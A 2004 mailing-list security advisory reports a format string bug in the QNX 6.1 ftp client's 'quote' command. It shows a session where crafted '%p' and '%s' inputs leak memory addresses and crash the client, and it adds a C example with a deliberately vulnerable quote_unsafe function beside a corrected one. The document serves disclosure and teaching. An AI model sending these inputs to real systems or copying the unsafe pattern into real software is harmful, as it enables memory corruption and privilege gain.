Message-ID: <200409131915.i8DJFbP04622@netsys.com>
From: julio at rfdslabs.com.br (Julio Cesar Fort)
Subject: QNX BUG FESTIVAL -- [RLSA_03-2004] QNX ftp client format string bug

*** rfdslabs security advisory ***

Title: QNX ftp client format string bug [RLSA_03-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 13 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>


1. Introduction

"QNX Software Systems has provided OS technology, development tools, and
professional services to companies building mission-critical embedded
systems. Since 1980 manufacturers have relied on QNX OS technology to power
their mission-critical applications - everything from medical instruments
and Internet routers to telematics devices, 9-1-1 call centers, process
control applications and air traffic control systems. Small or large, simple
or distributed, these systems share an unmatched reputation for operating 24
hours a day, 365 days a year, nonstop." (from http://www.qnx.com/products/rtos)


2. Details

The QNX 6.1 ftp client is vulnerable to a format string bug in the 'quote'
command. If successfully exploited, memory corruption occurs and attackers
can obtain 'bin' group privileges. This kind of privilege can be useful for
backdooring purposes, as an evil example.

# ftp 127.0.0.1
Connected to 127.0.0.1.
220 sandimas FTP server (Version 5.60) ready.
Name (127.0.0.1:root): sandimas
331 Password required for sandimas.
Password:
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)
#


3. Solution

QNX Software Systems was contacted on September 8th but the vendor didn't
reply. It seems they don't care much about security (they don't even have a
security staff e-mail, but the SALES e-mail address is everywhere at qnx.com!).


4. Timeline

15 Aug 2004: Vulnerability detected;
08 Sep 2004: rfdslabs contacts QNX: no success;

Thanks to DataStorm Technologies and some stranger in mobius.qnx.com who was
interested in rfdslabs.com.br.

www.rfdslabs.com.br - computers, sex, human mind and more
Recife, PE, Brazil
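
The defect class described in section 2, as an added example that is not part
of the original advisory and is not QNX code: a printf-style command builder
called with user text as the format string, beside the corrected call. The
names build_command, quote_unsafe and quote_safe are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a client's printf-style command builder.
 * Returns the line length, or -1 on a formatting error or truncation. */
static int build_command(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Vulnerable pattern: the user's text becomes the format string, so any
 * conversion specifier in it makes vsnprintf read arguments that were never
 * passed (undefined behaviour: leaked values or a memory fault). */
int quote_unsafe(char *out, size_t outlen, const char *user_args)
{
    return build_command(out, outlen, user_args);
}

/* Hardened pattern: constant format string, user text passed only as data. */
int quote_safe(char *out, size_t outlen, const char *user_args)
{
    return build_command(out, outlen, "%s\r\n", user_args);
}

int main(void)
{
    char line[128];

    /* Constructed input with the same shape as the advisory's test string. */
    if (quote_safe(line, sizeof line, "site exec \"%p.%p.%p.%p\"") > 0)
        fputs(line, stdout);   /* the specifiers are sent unchanged */
    return 0;
}
```

Compilers can flag the first pattern when the builder is declared with a
printf format attribute and format-security warnings are enabled.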

